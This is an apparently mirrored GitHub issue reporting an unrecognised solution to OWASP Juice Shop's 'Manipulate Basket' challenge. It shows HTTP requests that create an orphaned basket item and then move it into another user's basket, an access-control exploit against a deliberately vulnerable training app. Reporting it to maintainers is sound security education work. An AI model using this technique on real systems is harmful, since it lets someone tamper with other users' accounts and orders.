Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

[🐛] Alternative solution for "Manipulate Basket"

See original GitHub issue

🐛 Bug report

Description

There’s an alternative solution for the “Manipulate Basket” challenge. This solution is, however, not recognized by the Juice shop. So, I think this solution should be either recognized as the correct one, or it should not be allowed.

🔬 Minimal Reproduction

1) Create new basket item

POST /api/BasketItems/
Content-type: application/json

{"quantity":3,"ProductId":19}
---
{"status":"success","data":{"id":21,"ProductId":19,"quantity":3,"updatedAt":"2020-08-26T22:22:36.821Z","createdAt":"2020-08-26T22:22:36.821Z"}}

The trick here is to delete the basketId property! New basket item is created with null basketId. Just to confirm it:

GET /api/BasketItems/21
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:22:36.821Z","BasketId":null,"ProductId":19}}

2) Add basket item to basket Now we can put the basket item into another user’s basket (this wouldn’t possible if the basket item had already been in someone’s basket):

PUT /api/BasketItems/21
Content-type: application/json

{"BasketId":"8"}
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:23:45.932Z","BasketId":"8","ProductId":19}}

🌳 Your Environment

Docker image, Juice shop version v11.1.3

Issue Analytics

State:
Created 3 years ago
Comments:6 (3 by maintainers)

Top GitHub Comments

1reaction

vernjancommented, Aug 27, 2020

Hi, maybe one of

Does basket with ID 42 exists?
I remember I was getting some errors if quantity > 5
I used basket ID as String, not Integer (not sure if it matters though)
EDIT: Missing Content-type header?

0reactions

github-actions[bot]commented, Aug 28, 2021

This thread has been automatically locked because it has not had recent activity after it was closed. 🔒 Please open a new issue for regressions or related bugs.

Top Results From Across the Web

Hacking OWASP's Juice Shop Pt. 37: Manipulate Basket

Name: Manipulate Basket. Description: Put an additional product into another user's shopping basket. Difficulty: 3 star.

Broken Access Control - Pwning OWASP Juice Shop

Manipulate Basket, Put an additional product into another user's shopping basket.. Product Tampering, Change the href of the link within the OWASP ......

Basket Weaving FAQs

If you're new to basket weaving, you might have questions about materials, pattern terminology and other details of the craft. The following FAQs...

Juice Shop: manipulating the basket of another user

Solution. It's not possible to prevent people from editing and resending POST requests. We can only solve this by changing how the application...

WO2016187005A1 - Interchangeable basket treatment system ...

An interchangeable basket treatment system receives a removable agitation ... tolerances, measurement error, measurement accuracy limitations and other ...